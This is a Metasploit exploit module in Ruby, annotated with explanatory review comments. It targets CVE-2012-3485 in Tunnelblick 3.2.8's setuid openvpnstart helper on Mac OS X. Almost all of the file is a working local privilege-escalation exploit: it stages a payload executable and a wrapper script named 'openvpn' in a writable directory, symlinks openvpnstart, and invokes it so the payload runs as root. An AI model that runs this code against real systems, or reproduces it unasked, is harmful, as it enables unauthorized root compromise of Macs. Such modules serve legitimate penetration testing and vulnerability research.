Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against the setuid-root openvpnstart helper shipped
# with Tunnelblick 3.2.8 on Mac OS X (CVE-2012-3485, see 'References' below).
#
# Flow: +check+ confirms the configured openvpnstart path exists and is a
# setuid-root regular file; +exploit+ then stages the payload plus a wrapper
# script named "openvpn" under "<WritableDir>/openvpn/openvpn-0/", creates a
# randomly named symlink to openvpnstart inside WritableDir, and invokes the
# symlink with the arguments "OpenVPNInfo 0". Nothing is removed on success;
# +clean+ only runs when that final command raises. The leftover "openvpn"
# directory and the symlink are the on-disk artifacts of a run.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Module metadata and option registration.
  #
  # Two string options are registered: WritableDir (default "/tmp"), used as
  # the staging directory, and Tunnelblick (default path of openvpnstart).
  # Both are OptString rather than OptPath because they name paths on the
  # *remote* host, so nothing validates their contents locally.
  # DefaultOptions sets the payload option PrependSetresuid and WfsDelay
  # (seconds to wait for a session) to 2.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super( update_info( info, {
      'Name' => 'Setuid Tunnelblick Privilege Escalation',
      'Description' => %q{
        This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
        vulnerability exists in the setuid openvpnstart, where an insufficient
        validation of path names allows execution of arbitrary shell scripts as root.
        This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099
        over Mac OS X 10.7.5.
      },
      'References' =>
        [
          [ 'CVE', '2012-3485' ],
          [ 'OSVDB', '84706' ],
          [ 'EDB', '20443' ],
          [ 'URL', 'http://blog.zx2c4.com/791' ]
        ],
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
          'juan vazquez' # Metasploit module
        ],
      'DisclosureDate' => '2012-08-11',
      'Platform' => 'osx',
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell' ],
      'Targets' =>
        [
          [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
          [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
      'DefaultTarget' => 0
    }))
    register_options [
      # These are not OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
      OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])
    ]
  end

  # Staging directory on the target.
  #
  # @return [String] the WritableDir option coerced with to_s
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Checks whether the configured openvpnstart looks exploitable.
  #
  # Vulnerable is reported when the Tunnelblick path exists as a file and the
  # output of `find <path> -type f -user root -perm -4000` contains
  # "openvpnstart", i.e. it is a regular file owned by root with the setuid
  # bit set. Only ownership and mode are tested, never the Tunnelblick
  # version. NOTE(review): a fixed build that is still setuid root would
  # presumably also be reported Vulnerable here.
  #
  # @return [Msf::Exploit::CheckCode] Safe or Vulnerable
  def check
    unless file? datastore['Tunnelblick']
      vprint_error 'openvpnstart not found'
      return CheckCode::Safe
    end

    # The local `check` shadows this method's own name for the rest of the
    # body; it holds the raw output of the find command.
    check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")

    unless check.include? 'openvpnstart'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Removes the artifacts created by +exploit+: the symlink stored in @link
  # and the whole "<WritableDir>/openvpn" tree. Relies on @link having been
  # set by +exploit+; called earlier, file_rm would receive nil.
  def clean
    file_rm(@link)
    cmd_exec("rm -rf #{base_dir}/openvpn")
  end

  # Stages the payload and triggers openvpnstart through a symlink.
  #
  # Aborts via fail_with when the session is already root, when +check+ is
  # not Vulnerable, or when base_dir is not writable. Otherwise it creates
  # "<base_dir>/openvpn/openvpn-0", writes the payload executable there under
  # a random 8-letter name, writes a two-line sh wrapper named "openvpn"
  # beside it that execs the payload, symlinks openvpnstart to a random
  # 8-letter name in base_dir, and runs "<symlink> OpenVPNInfo 0".
  #
  # Every datastore path is interpolated unquoted into the shell commands;
  # a WritableDir or Tunnelblick value containing spaces or shell
  # metacharacters would break or alter those commands.
  #
  # @return [void] files are left on disk on success (a warning is printed);
  #   on a raised StandardError from the final cmd_exec they are cleaned up
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    print_status("Creating directory...")
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

    exe_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{@exe_file}"


    # Wrapper script; the heredoc body is written verbatim (no indentation
    # stripping), so the shebang stays at column 0.
    evil_sh =<<-EOF
#!/bin/sh
#{@exe_file}
EOF

    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
    print_status("Dropping shell script #{@sh_file}...")
    write_file(@sh_file, evil_sh)
    cmd_exec "chmod +x #{@sh_file}"

    link_name = rand_text_alpha(8)
    @link = "#{base_dir}/#{link_name}"
    print_status("Creating symlink #{@link}...")
    cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"

    print_status("Running...")
    begin
      cmd_exec "#{@link} OpenVPNInfo 0"
    rescue
      # Bare rescue catches StandardError only; the staged files are removed
      # and the method returns without re-raising.
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
      clean
      return
    end
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
  end
end